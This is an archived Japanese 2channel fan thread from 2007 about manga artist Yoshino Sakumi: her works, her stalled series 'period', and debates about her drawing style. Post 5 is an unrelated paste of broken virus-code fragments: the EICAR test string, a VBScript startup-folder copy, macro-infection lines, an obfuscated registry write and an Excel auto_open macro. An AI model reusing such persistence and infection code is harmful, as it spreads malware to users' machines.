2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

吉野朔実 7

1 :花と名無しさん:2007/11/14(水) 23:49:23 ID:???0
引き続き、吉野朔実先生の作品を語りましょう。
現在、月刊誌「IKKI」での連載「period」は、中断のまま消息不明。

≪最近の単行本≫
period 既刊2巻まで (2004/05/28)
記憶の技法 (2002/10) 小学館 PFコミックス
瞳子 (2001/06/01) 小学館 ※書籍扱いのハードカバー本
栗林かなえの犯罪 (2001/05/01) 小学館 PFコミックス
グールドを聴きながら (2000/08/01) 小学館 PFコミックス

その他作品リストと過去スレ案内は、>>2-以降

2 :花と名無しさん:2007/11/14(水) 23:50:42 ID:AQOtkHsP0
前スレ:吉野朔実 6
http://anime2.2ch.net/test/read.cgi/gcomic/1136119805/

過去スレ
吉野朔実5
http://comic6.2ch.net/test/read.cgi/gcomic/1095879272/
吉野朔実4
http://comic6.2ch.net/test/read.cgi/gcomic/1061264219/l50
吉野朔実3
http://comic.2ch.net/test/read.cgi/gcomic/1028341228/l50
吉野朔実2
http://comic.2ch.net/gcomic/kako/998/998679796.html
吉野朔実

3 :花と名無しさん:2007/11/14(水) 23:52:21 ID:???0
[アンソロジー]
アディダス マンガフィーバー 単行本 (2002/05/14) 飛鳥新社

[旧作を文庫で]
グールドを聴きながら 小学館文庫
月下の一群 (1〜2) 集英社文庫
少年は荒野をめざす (1〜4) 集英社文庫
ジュリエットの卵 (1〜3) 小学館文庫
恋愛的瞬間 (1〜3) 小学館文庫
ぼくだけが知っている(1〜3)
いたいけな瞳(全5巻)小学館文庫

4 :花と名無しさん:2007/11/14(水) 23:57:12 ID:???0
[オトナ絵本系]
もっと幸福な一日 (1994/02/01) 大和書房
プレゼントをあげる (1999/11/01) 大和書房
ましまる―おかえりなさいをきくまでは (2001/01/01) 大和書房
眠れない夜には星を数えて

[エッセイ・文章系]
こんな映画が、―吉野朔実のシネマガイド (2001/07/01) PARCO出版
弟の家には本棚がない―吉野朔実劇場 (2002/04/01) 本の雑誌社
お母さんは「赤毛のアン」が大好き―吉野朔実劇場 (2004/05) 角川文庫
お父さんは時代小説(チャンバラ)が大好き (2002/02/01) 角川書店 ←文庫化
犬は本よりも電信柱が好き―吉野朔実劇場(2004/09/22)本の雑誌社
本を読む兄、読まぬ兄―吉野朔実劇場

「治らない」時代の医療者心得帳 カスガ先生の答えのない悩み相談室
(著者/訳者名:春日武彦、画:吉野朔実)

・昭和住宅メモリー -エクスナレッジムック X-Knowledge 5-


※このリストは吉野 朔実先生の全著作リストではありません。
その他情報ある方、補足お願いします。

5 :花と名無しさん:2007/11/15(木) 00:35:27 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


6 :花と名無しさん:2007/11/15(木) 00:56:53 ID:???0
>>1
乙。

即死防止ついでに。

毎月25日発売、「IKKI」公式サイト
ttp://www.ikki-para.com/

period紹介ページ
ttp://www.ikki-para.com/comix/period.html

7 :花と名無しさん:2007/11/15(木) 01:13:46 ID:???0

       _ ヘ.,           r''刀      厂刀、            , ヘ _
     z< : : : :\____/-‐←‐- 、,___//: : : \____/: : : : >r
      { : : , : : : : : : : : _>'´: : : :_,.- " : :/弌》__: : : : : : : : : : : : : : : : : : , : : }
      \ : :¨: :-イ ̄`: : : : : : : : : :¨ ‐-、 : :\⌒>、: : : : : : : _: :-: :¨: : /
       \: :/: : : : : : : : /: :.,': : : : :: : : : : \ ∧     ̄ ̄フ : : : : : :/
            y:/: : : /: : :.ハ : :ト、 \: : : : \ : :Y i|      / : : : : : /
    ,     | l: : :./: : :./ハ: :{ \j\j : : ∧, j: :|.    /: : : : :/           、
   /{     | |: : :| : : ,`匕  `‐z匕  \ : : }K: j.     /: : : : :/          }\
 / : :|      j,ハ: : |: :∧fて!  イfて)'y  Y: :jF'},ノ   ,': : : : :/              |.: :.\
ハ : :,z|       \ト、{ ハ ヒリ    ヒ::リ '  j /rソ    イ: : : : :.{              ト、: : ハ
{: : :(: :ヽ ______j,从 " 、   ""   ム/     ,{|: : : : : ト、_______ イ: :): : :.}
ヽ : : : : : : : : : : : : : : : : : : : ゝ、 rっ   , イ,|_⌒    ハ: : : : : : : : : : : : : : : : : : : : : : : : /
  `ミ: : : : : : : : : : : : : : : : : :/>-r<_/ iト、  \  \、: : : : : : : : : : : : : : : : : : 彡イ
     ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄x<7イx公、   // \ _〉\_   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
               rく  // 〉::::fゝ_イ /     |     ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ .!
               ∧,  // /⌒i|  / /      i| こ、これは>>1乙じゃなくて  |
               { j { { /:::::::::| ,/ /       | ツインテールなんだから.    |
               | | ∧∨:::::::::::レ' /    ヘ,  | 変な勘違いしないでよね!  |

8 :花と名無しさん:2007/11/15(木) 13:34:31 ID:???O
ピリオド消息不明とか勘弁してください…

9 :花と名無しさん:2007/11/15(木) 17:21:54 ID:???0
      〜よくある質問と答え〜

Q:吉野先生の「○○○○」という作品の
  □□□□が△△△△で××××のシーンですが、
  ☆☆☆☆の『〜〜〜〜』というセリフの意味が
  よく解りません。またこの時の@@@@の心情としては
  カクカクシカジカなのでしょうか?それともシカジカカクカクで………


A:混乱を愛して

10 :花と名無しさん:2007/11/15(木) 23:33:42 ID:???0
今月の本の雑誌を読んで思ったんだが
「混乱を愛して」って
要は「わからない事はわからないままにしとくのがいい」ってことなのね。

11 :花と名無しさん:2007/11/16(金) 11:27:22 ID:i5ifsjAcO
狩野とか月下の一群の主人公とかさ
必ず年上で美形の保護者みたいなのが恋をしてきてうらやましすぎる
またあぁいうのかいてくれないのかなぁ
最近のは絵がイラストレーターみたいになってて心理分析が主体でくどいっていうか


12 :花と名無しさん:2007/11/16(金) 13:32:09 ID:???0
そういえば、「少女漫画」を描いて欲しい気はするなぁ。

13 :花と名無しさん:2007/11/16(金) 22:41:33 ID:/KA4wUEC0
ピリオド は本誌にもなかなか載りませんね。
恋愛的瞬間とかは そうか〜と自分の恋愛にも活用できて
おもしろかったな。
前にサイン会の時に月下の一群の続編はありえないですか と
聞いて即答で「ないです。」と言われました。
何言ってんの この子?! 的な視線でしたが、それぐらい昔でも
大好きな作品なんだということを知って欲しかったのです。
あの独特の雰囲気で進む恋愛模様がすきだった。



14 :花と名無しさん:2007/11/16(金) 22:55:44 ID:???0
少年は荒野〜の途中までは存在した
絵にかける情熱みたいなものが、もう感じられないんだよな…
絵描くのが苦手な人なのかもとページめくるたびに思ってしまう

15 :花と名無しさん:2007/11/17(土) 00:56:22 ID:???0
狩野は途中からまつげが無くなったんだっけな

16 :花と名無しさん:2007/11/17(土) 01:40:00 ID:???0
>>13
「"月下の一群"がとても好きで、続編があったらぜひ読んでみたい」と
言えば、ちょっと違かったかも…「有り得ないですか?」って、質問の仕方として
ちょっと変に聞こえたかも知れないよ。

17 :花と名無しさん:2007/11/17(土) 14:21:47 ID:???O
「少年は荒野をめざす」はタイトル買いしたら凄く面白くてはまった。
その後ずっと追いかけてたけど、やはり絵がダメになって…
エッセイは面白いから本が出ると買ってます。
「本を読む兄、読まぬ兄」のあとがきは、今流行り?の肉筆原稿w
内容は…怖!

18 :花と名無しさん:2007/11/17(土) 18:22:59 ID:???0
作者ご本人はなかなか雰囲気よさげな女性というイメージなんだけど
絵的な問題として、人物の表情が下品なのがなんとも…。キメ台詞も間抜けに見えるし
ある程度は円熟期のレベルにまで画力を戻して欲しいです

19 :花と名無しさん:2007/11/18(日) 02:12:37 ID:???O
個人的には後期の絵の方が好きだし、どんどん上手くなってると感じてる

20 :花と名無しさん:2007/11/18(日) 02:33:20 ID:???0
絵柄の変遷は、漫画家稼業が長ければほとんどの漫画家で起こり
仕方ない。安易に上手い・下手を論じても平行線になるだけなので
何とも言えないが、個人的に好きなのは、少年は荒野〜の頃の
キラキラ繊細な感じの絵だなぁ。

リアル連載当時の刷り込みがあるんだろうけど。
その頃好きだったけどコミックス買わず→文庫版で惚れ直して
今更吉野さんの過去作を集めている今日この頃w

21 :花と名無しさん:2007/11/18(日) 02:43:13 ID:???0
>>20
同じく。勿論好みの問題だとは思うけどね

恋愛的瞬間とか、話は面白くて好きなんだけど
できれば少年〜序盤の絵柄で読みたかったなあ、と思う
切迫したシーンの臨場感がまず違うと思うから

22 :花と名無しさん:2007/11/18(日) 09:33:39 ID:???0
大好きだっ筈なのに、
月下の一群を読み直したら
主人公が嫌いだと感じるようになってた。
これで手放せる。

23 :花と名無しさん:2007/11/18(日) 13:31:45 ID:???0
いや、吉野作品の主なヒロインはいわゆる不思議ちゃんだから
そもそも好き嫌い分かれるタイプだよ
自分は嫌いじゃないけど好きと感じた事はない>月下主人公

24 :花と名無しさん:2007/11/19(月) 00:53:15 ID:???0
吉野漫画の主人公を好きって真面目に言ってる人がいたら引く。

25 :花と名無しさん:2007/11/19(月) 00:55:22 ID:???0
病んでない人が殆どいないもんな。>主人公たち

26 :花と名無しさん:2007/11/19(月) 01:04:07 ID:???0
まあ、夢を覗かれるのは勘弁だ
エッチな夢なんか見てた日にはw

27 :花と名無しさん:2007/11/19(月) 01:07:32 ID:???0
狩野に対する海棠ちゃんの感覚が一番穏やか?
嫌いと言ってやりたい、でも自分の世界持ってて表現できてすごい、
あいつなりに辛い事もあるんだな、友達になれてよかったよ、ての

28 :花と名無しさん:2007/11/19(月) 19:33:36 ID:???0
>>24
らいち大好き。

29 :花と名無しさん:2007/11/19(月) 22:58:39 ID:???0
海棠ちゃんは家庭の事情的な描写はなかったから、同じ脇キャラでも
エキセントリクスの拓生ほど歪んだ生活ではないのかもね。

30 :花と名無しさん:2007/11/19(月) 23:03:50 ID:???0
海棠ちゃんは元々の性格がややキツめなだけで
それ以外は非常にまともじゃない?男の趣味もw

31 :花と名無しさん:2007/11/19(月) 23:51:30 ID:???0
菅埜と小林はフェイドアウトさせるには惜しいキャラだった。

32 :花と名無しさん:2007/11/20(火) 00:28:16 ID:???O
狩野の年であそこまでロン毛なのって凄くない?
あれは5歳で人生をやり直さねばならなくなった事と関係あるのかな。

33 :花と名無しさん:2007/11/20(火) 00:35:43 ID:???0
考えたことなかったけど、そうかも。5歳から毛先カットだけして伸ばしたのかもね
菅埜好きだったな

34 :花と名無しさん:2007/11/20(火) 01:36:06 ID:???0
http://sorimati.s3.x-beat.com/upload/source/up0140.jpg

35 :花と名無しさん:2007/11/20(火) 19:27:21 ID:NMkcRUGgO
>>24
普通に好きですよ
おかしいですか?
好きなのと自己を重ね合わせるのは別、と思っているが実際のところははっきりしませんが・・


恋愛的瞬間はおもしろいけど普通の大学生にああいうくどいセリフ言わせるのには違和感がありまくるなぁ
あと最近の絵は横顔が原人みたいでなんか嫌
わざとなんだろうけど作者もああいう顔なのかな
絵は作者に似るって言うし

36 :花と名無しさん:2007/11/20(火) 22:27:57 ID:???0
>あと最近の絵は横顔が原人みたいでなんか嫌
恐竜みたいな鳴き声とか原人みたいな横顔ってたとえを使う人って何歳くらいなんだろう?
かなり年寄りと見た。

37 :花と名無しさん:2007/11/20(火) 22:36:03 ID:???0
そんな例えあるんだw
でも原人のような横顔、というのは分かるよ
上手く言えないけどパサパサに色気の抜けた絵…
「頓着しない表情」を狙って外したかんじの

38 :花と名無しさん:2007/11/21(水) 00:14:01 ID:???0
ごめん原人はわからねぇw

39 :花と名無しさん:2007/11/21(水) 00:18:26 ID:???0
受け口で顎のない、不思議な骨格になってるせい。

40 :花と名無しさん:2007/11/21(水) 01:06:06 ID:o9aafxjdO
>>36
22歳ですよ
としよってますかね?
普通に中学生も原人とかいってますよ?
ちょっと意味がわからないな


41 :花と名無しさん:2007/11/21(水) 01:08:34 ID:o9aafxjdO
原人の例えがわからないって。。。
つまり猿みたいな顔って事なんですが
普通に使うしなんで年寄り扱いされるのかなぁ?

42 :花と名無しさん:2007/11/21(水) 01:42:28 ID:???0
横顔はそんなに気にならないが、いたいけな瞳以降2〜30代の
女性の顔がみんな小学生に見える方が気になる。
ジュリエットの卵の蛍は綺麗な大人顔だったのに。

43 :花と名無しさん:2007/11/21(水) 01:50:44 ID:???0
断言はできないけど、所謂「大人」の女性が描けなくなってる感じはするよね
子供っぽいタイプを意識して描いてる場合もあると思うけど

自分は恋愛的瞬間の六月がハルタを誘惑する話において
六月の表情というか顔があまりにいけてなくて残念だった…

44 :花と名無しさん:2007/11/21(水) 02:07:55 ID:???0
あー、なるほど。
キャラの内面が子供っぽいから、余計幼く感じるのかもしれない。

>六月の表情というか顔があまりにいけてなくて
たしかにあれは男を誘う表情じゃないよね。
テロリストに話に出てくる覗き部屋で働く女の子も全然エロくなかったし。
吉野さんの描く女性は可愛いけれど、色気を感じないな…。


45 :花と名無しさん:2007/11/21(水) 03:09:13 ID:???0
>>41
年寄り、ばばあっていうと打撃を受けると思い込んでる
中年のおっさんですよ。放置しておきましょう。

46 :花と名無しさん:2007/11/21(水) 07:40:44 ID:???0
年寄り、ばばあ、中年のおっさん、キモハゲ、ゴミムシ、タイツフェチの熟女マニアの毛根死滅頭皮!!

47 :花と名無しさん:2007/11/21(水) 15:43:21 ID:???0
何かインタビューで言ってたんですが
絵にあんまりこだわりがないんだそうです
アシスタンとにも割りと好きにやらせているそうです
いいたいことが伝わればそれで良いみたいな感じで
どんどん白くしていきたいとか

48 :花と名無しさん:2007/11/21(水) 20:57:28 ID:o9aafxjdO
ああつまりもうある程度固定客がついてまあまあ稼いだから
もう手間暇かけないで気楽にかいてもうけたいなー
みたいな感じなんだ

49 :花と名無しさん:2007/11/21(水) 21:03:52 ID:???0
語彙は達者というか文章書ける人だと思う。カラー画なんかセンスあって綺麗なのに
勿体無くても仕方がないのかな。ただ、この人が文章で創作しようとした場合
漫画でみせる程にはうまくいかない気がする。

50 :花と名無しさん:2007/11/21(水) 22:47:34 ID:???0
>>47
もしかして「漫画」という媒体に対して、あまり執着や愛情がないのかも???
自分の創作活動がどんな形で発表されてもおkで
若かった当時、自分がチャレンジ出来たのが、たまたま漫画だったんだろうか?

51 :花と名無しさん:2007/11/21(水) 22:58:46 ID:???0
物語の構築より、その解体の方に意識が移っちゃったのかな。
前者は世界観の描出に並々ならぬ情熱を感じたんだけど、
後者への移行にそってタッチもゆるく画面も白くなっていった気がする。

52 :花と名無しさん:2007/11/21(水) 23:15:33 ID:???0
まぁずーーーーっと荒野みたいな絵柄と世界を作り続けてたら
描く方はしんどいなんてもんじゃなかろう。。

個人的にはピリオドは全然許容範囲。コラムとかのクルクルした線画イラストはいまいち。

53 :花と名無しさん:2007/11/22(木) 00:16:45 ID:???0
たぶん同じインタビューを読んだ。
究極まで絵をシンプルにして、少ない文字と少ない絵の情報で
言いたいことを伝えたい、と、そんな感じのニュアンスだったと思う。

54 :36:2007/11/22(木) 00:20:49 ID:???0
>>40-41 >>45
いや、単に見たことない癖に、恐竜の声や原人の顔を例えに使いたがる人の考えがわからないと書いただけだよ。
「かなり年寄り」ってのは、単にそういう意味のネタ。
嫌味ではあるんだが、直球で受け取られるとは思わないかった。

あと、原人の正確な復元は当然無理だけど頭骨は他の霊長類とはかなり違うし、顎は現代人よりがっちりしてる。
とマジレスしておく。

55 :36:2007/11/22(木) 00:22:48 ID:???0
×例え
○喩え
失礼。

56 :花と名無しさん:2007/11/22(木) 00:23:04 ID:???0
>>54
うわーwwww痛い人きたーwwwww

アゴがガッチリしてるから原人っぽいっていわれるんでないの?w

57 :花と名無しさん:2007/11/22(木) 00:24:02 ID:???0
白い吉野も好きだ。

58 :花と名無しさん:2007/11/22(木) 00:27:23 ID:???0
いたいけな頃のがちょうどよくて好きだ

59 :花と名無しさん:2007/11/22(木) 00:27:29 ID:???0
>>56
>>39のことじゃないの

60 :花と名無しさん:2007/11/22(木) 00:29:29 ID:???0
>>56
年寄りとぜんぜん関係ないよね。
何がそういう感じののネタなんだろうね。

ちょっと痛すぎるよね。

61 :花と名無しさん:2007/11/22(木) 00:31:31 ID:???0
自演うざす

62 :花と名無しさん:2007/11/22(木) 00:46:15 ID:???0
どっちもうぜぇ

63 :花と名無しさん:2007/11/22(木) 00:52:14 ID:???0
>>39ですが、
それについてどういうやりとりになっているのかよく分かりません。
何であれ、現作風支持の方に対して無礼かますつもりはありません。

64 :花と名無しさん:2007/11/22(木) 12:26:54 ID:YoXmQSq+O
>>53
絵はシンプルになるが内容はくどくなっていくというアンバランスさだな

65 :花と名無しさん:2007/11/22(木) 12:30:33 ID:YoXmQSq+O
>>54
原人のたとえを用いたものですが
原人や恐竜の実際の姿はたしかにわからないけど教科書や百科事典に一般共通認識的なものとしてのイラストが存在しています
科学博物館などにある原人モデルなど、だいたいその外観は統一されています
揚げ足取りにしか思えない発言にプラスしてわけのわからない皮肉を言う
これは悪意があるとしか思えません

66 :花と名無しさん:2007/11/22(木) 12:44:20 ID:???O
このスレでスルー検定が始まるとは…w

67 :花と名無しさん:2007/11/22(木) 13:16:47 ID:???0
最初期はデカダン志向も強かったと思うけど、作家が変わるのは仕方がないね…。
少年〜で唐突に散りばめられるモノローグの数々をリアルなものにしていたのは
あの異常に丁寧に描かれたアイテムの数々だったと思う。
散文詩や叙景詩の世界から心理学的分析の世界?に完全移行しちゃうのね。

68 :花と名無しさん:2007/11/22(木) 19:46:57 ID:???O
原人はホモ・エレクトスやホモ・ハビリス等の色んな種の総称だから顔立ちはかなり変わるでしょ、と横レス。

69 :花と名無しさん:2007/11/22(木) 19:48:53 ID:???O
>>65は旧人か何かと勘違いしてるんじゃないかな。
猿みたいな顔というから猿人?

70 :花と名無しさん:2007/11/22(木) 20:47:41 ID:YkFcnK3X0
猿の軍団(猿の惑星じゃなく)が、ふと見たくなったなあ。

71 :花と名無しさん:2007/11/23(金) 01:40:41 ID:???0
何かの美人判定で、鼻先と顎を結ぶ線から口が突き出てたら、アウトだよね(確か…)
やはりキーラ・ナイトレイぐらい顎が出てないとw


72 :花と名無しさん:2007/11/23(金) 01:42:42 ID:???0
ビューティラインだっけ
鼻のてっぺんと顎を結びその間に唇がおさまるのが理想的
顎出っ張りも限度があるけど、顎無しはちとむずかしいね

73 :花と名無しさん:2007/11/23(金) 13:02:34 ID:???0
短歌もやっておられるみたいだから、画もどんどんシンプルにしていきたいのかな。

74 :花と名無しさん:2007/11/23(金) 17:10:48 ID:???0
ぼくだけ〜の頃の絵が好きだなあ

75 :花と名無しさん:2007/11/26(月) 17:31:18 ID:???0
この人は映画とか取った方が良いかも。
吉野さんの世界観で統一されてる映像を見てみたい。


76 :花と名無しさん:2007/11/26(月) 17:35:08 ID:???0
ぼくだけ〜の頃は既に絵がグレてたと思う…あの目つきと口の歪み方きらい

77 :花と名無しさん:2007/11/26(月) 23:25:48 ID:???0
>絵がグレてた

禿ワロタw 言い得て妙?まさにそんな感じだ。
物事を正面から捉えずに、斜めから見て考えるキャラの性格が
そのまま絵になったかのような…。

21 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)